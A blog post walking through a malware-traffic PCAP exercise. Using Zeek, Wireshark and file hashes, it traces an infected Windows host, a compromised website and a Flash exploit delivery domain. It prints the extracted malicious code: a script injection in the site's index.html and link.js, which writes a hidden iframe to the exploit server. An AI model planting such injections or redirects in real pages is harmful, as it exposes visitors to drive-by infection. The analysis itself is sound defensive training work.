PCAP Analysis – 3

As my winter vacations come to an end, I decided to start warming up my brain in preparation for the final semester of my graduate program. Malware-Traffic-Analysis.net is a very good resource for practicing PCAP analysis. In this article, I describe my answers to the analysis questions of the PCAP file available here.

Note: In this article, I’m using Splunk / Wireshark for the complete PCAP analysis.

root@malnet:~/malware_traffic_exercises/2014-12-15# zeek -Cr 2014-12-15-traffic-analysis-exercise.pcap

root@malnet:~/malware_traffic_exercises/2014-12-15# ls
2014-12-15-traffic-analysis-exercise.pcap  conn.log  dhcp.log  dns.log  files.log  http.log  packet_filter.log  ssl.log  weird.log  x509.log

Hostnames of Windows VMs

The hostnames of the three Windows hosts are:


IP Address of Infected Windows Host and Compromised Website

In the snap below, we can see that there is traffic to an unusual port, 22780. From past experience, I know that malware often communicates on unusual ports.

The machine with IP address 192[.]168[.]204[.]137 communicated with a remote host, epzqy[.]iphaeba[.]eu (IP address 168[.]235[.]69[.]248), and successfully downloaded three files.

After extracting the files using Wireshark, I hashed them and checked on VirusTotal.

root@malnet:~/malware_traffic_exercises/2014-12-15/Files# sha256sum *
db44b3235157740309e417751f5f244c3077fe35196456e1c19862bf18eee64f  48950
d748b12fd4058ca4bc3c2667ac5d445fa65e132a3bf0da0c067e20716240eb88  claimpl
9872a87cc4ce1b9430ad1567dd009191c441f9c7973ad6fb3a5f455ed6235866  land

The 48950 file was detected as malicious on VirusTotal and appears to exploit Adobe Flash.

root@malnet:~/malware_traffic_exercises/2014-12-15/Files# file 48950 
48950: Macromedia Flash data (compressed), version 19

With the above information, it can be said that epzqy[.]iphaeba[.]eu (IP address 168[.]235[.]69[.]248) is delivering malware. The domain http://www[.]theopen[.]be/ (IP address 213[.]186[.]33[.]19) is compromised, because it redirects users to the malicious domain above. The Windows host with IP address 192[.]168[.]204[.]137 and MAC address 00:0c:29:9d:b8:6d is infected. No other host downloaded the malware, as seen earlier in the downloaded-files snap.

Redirect Link Between Malware Delivery and Compromised Website

In Wireshark, I exported packets relevant to the infected Windows host, 192[.]168[.]204[.]137 into a separate PCAP file.

Using the filter http.request, I displayed all requests made by the infected host to remote domains. First contact with the malware delivery website was made at packet number 344, with the referrer http://theopen[.]be, which is the compromised website. Before that, there was another redirect from the compromised website to the domain col[.]reganhosting[.]com.

Using Wireshark, I extracted the index.html page of the compromised website and the link.js file that was downloaded from col[.]reganhosting[.]com. In link.js, there is a redirect to the malware delivery website, as can be seen below:

root@malnet:~/malware_traffic_exercises/2014-12-15/Files# cat link.js 
document.write(("<iframe src='http://epzqy.iphaeba.eu:22780/flow/17610/avenue/67785/source/43028/total/7782/misery/swirl/some/29364/patience/interval/ford/settle/knot/55468/anyone/land/' name='yBnYN' width=13 height=10 frameborder=0 marginheight=0 marginwidth=0 scrolling=no> "));

In index.html of the compromised website, there is a redirect to the malicious website, col[.]reganhosting[.]com.

root@malnet:~/malware_traffic_exercises/2014-12-15/Files# cat index.html
</html><script type='text/javascript' src='http://col.reganhosting.com/link'></script>
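As an added example (not code from the original post or from Zeek), the following Python script parses a Zeek http.log like the one generated at the top of the post, applies the two triage cues used above (an unusual destination port and a Flash payload) and reconstructs the referrer relationships for the infected host. The log lines are constructed to mirror the post's findings; the timestamps and the 10.0.0.5 address used for col.reganhosting.com are placeholders.

```python
# Added example (not from the original post or from Zeek): parse a Zeek http.log and
# reconstruct the post's redirect chain. Log lines are CONSTRUCTED; ts and 10.0.0.5 are placeholders.
from urllib.parse import urlsplit

STANDARD_WEB_PORTS = {80, 443, 8080}
SAMPLE_HTTP_LOG = "\n".join([
    "#fields\tts\tid.orig_h\tid.resp_h\tid.resp_p\thost\turi\treferrer\tresp_mime_types",
    "1418654400.10\t192.168.204.137\t213.186.33.19\t80\twww.theopen.be\t/\t-\ttext/html",
    "1418654400.35\t192.168.204.137\t10.0.0.5\t80\tcol.reganhosting.com\t/link"
    "\thttp://www.theopen.be/\tapplication/javascript",
    "1418654401.02\t192.168.204.137\t168.235.69.248\t22780\tepzqy.iphaeba.eu"
    "\t/flow/17610/land/\thttp://www.theopen.be/\ttext/html",
    "1418654402.50\t192.168.204.137\t168.235.69.248\t22780\tepzqy.iphaeba.eu\t/48950"
    "\thttp://epzqy.iphaeba.eu:22780/flow/17610/land/\tapplication/x-shockwave-flash",
    "1418654403.00\t192.168.204.136\t93.184.216.34\t80\texample.com\t/\t-\ttext/html",
])

def parse_zeek_log(text):
    """Parse Zeek TSV output into dicts keyed by the names in its #fields line."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            records.append(dict(zip(fields, line.split("\t"))))
    return records

def flag_suspicious(records):
    """Triage rule from the post: web traffic on an unusual port, or a Flash payload."""
    return [(r["id.orig_h"], r["host"], int(r["id.resp_p"]), r["uri"]) for r in records
            if int(r["id.resp_p"]) not in STANDARD_WEB_PORTS
            or "shockwave-flash" in r["resp_mime_types"]]

def referrer_tree(records, client_ip):
    """Map each referring host (None = no Referer) to the requests it led to."""
    tree = {}
    for r in records:
        if r["id.orig_h"] == client_ip:
            parent = urlsplit(r["referrer"]).hostname if r["referrer"] != "-" else None
            tree.setdefault(parent, []).append((r["host"], int(r["id.resp_p"]), r["uri"]))
    return tree

def chain_to(records, delivery_host):
    """Follow Referer headers back from the first request to delivery_host."""
    first = {r["host"]: r for r in reversed(records)}   # earliest request per host wins
    chain, cur, seen = [], first.get(delivery_host), set()
    while cur and cur["host"] not in seen:              # seen-set guards referrer loops
        seen.add(cur["host"])
        chain.append(f'{cur["host"]}:{cur["id.resp_p"]}')
        cur = first.get(urlsplit(cur["referrer"]).hostname) if cur["referrer"] != "-" else None
    return chain[::-1]
```

Note that col.reganhosting.com shows up as a sibling of the iframe host under www.theopen.be rather than as a link in the chain, because an iframe written by an injected script carries the parent page, not the script, as its Referer; that is why the body of link.js itself had to be read to connect the two hops.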

In this article, I described my analysis for the provided PCAP file. The most important aspect of this analysis was to find the redirect link that occurs from the compromised website to the malware delivery domain.

Thank you for reading! If you have any questions, leave them in the comments section below and I’ll get back to you as soon as I can!
